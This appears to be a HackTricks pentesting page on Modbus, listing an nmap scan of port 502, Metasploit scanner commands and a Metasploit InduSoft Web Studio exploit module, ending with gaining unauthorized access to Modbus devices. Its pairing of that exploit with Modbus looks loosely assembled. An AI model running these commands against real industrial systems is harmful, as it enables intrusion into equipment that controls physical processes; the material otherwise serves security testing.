<summary><strong>Learn AWS hacking from zero to hero with</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
In 1979, the **Modbus Protocol** was developed by Modicon, serving as a messaging structure. Its primary use involves facilitating communication between intelligent devices, operating under a master-slave/client-server model. This protocol plays a crucial role in enabling devices to exchange data efficiently.
The first step in enumerating Modbus services is to perform a port scan using `nmap`. This will help identify open ports on the target system.
```bash
nmap -p 502 <target_ip>
```
### Metasploit
Metasploit also provides modules for scanning Modbus services. The `auxiliary/scanner/modbus/modbusclient` module can be used to scan for Modbus devices.
```bash
use auxiliary/scanner/modbus/modbusclient
set RHOSTS <target_ip>
run
```
## Modbus Enumeration
Once the Modbus service is identified, the next step is to enumerate the available Modbus units and their associated registers.
### Modscan
Modscan is a popular tool for Modbus enumeration. It can be used to scan for Modbus devices and retrieve information about their registers.
Once the Modbus units and registers are enumerated, it is possible to exploit vulnerabilities in the Modbus implementation.
### Modbus Client
Modbus Client is a tool that can be used to interact with Modbus devices. It allows sending custom Modbus requests and analyzing the responses.
```bash
modbusclient.exe <target_ip>
```
### Metasploit
Metasploit provides modules for exploiting Modbus vulnerabilities. The `exploit/windows/scada/indusoft_web_studio_exec` module can be used to exploit InduSoft Web Studio vulnerabilities.
```bash
use exploit/windows/scada/indusoft_web_studio_exec
set RHOSTS <target_ip>
run
```
## Conclusion
Enumeration is a crucial step in the Modbus pentesting process. By identifying open ports, enumerating Modbus units and registers, and exploiting vulnerabilities, it is possible to gain unauthorized access to Modbus devices.
<summary><strong>Learn AWS hacking from zero to hero with</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
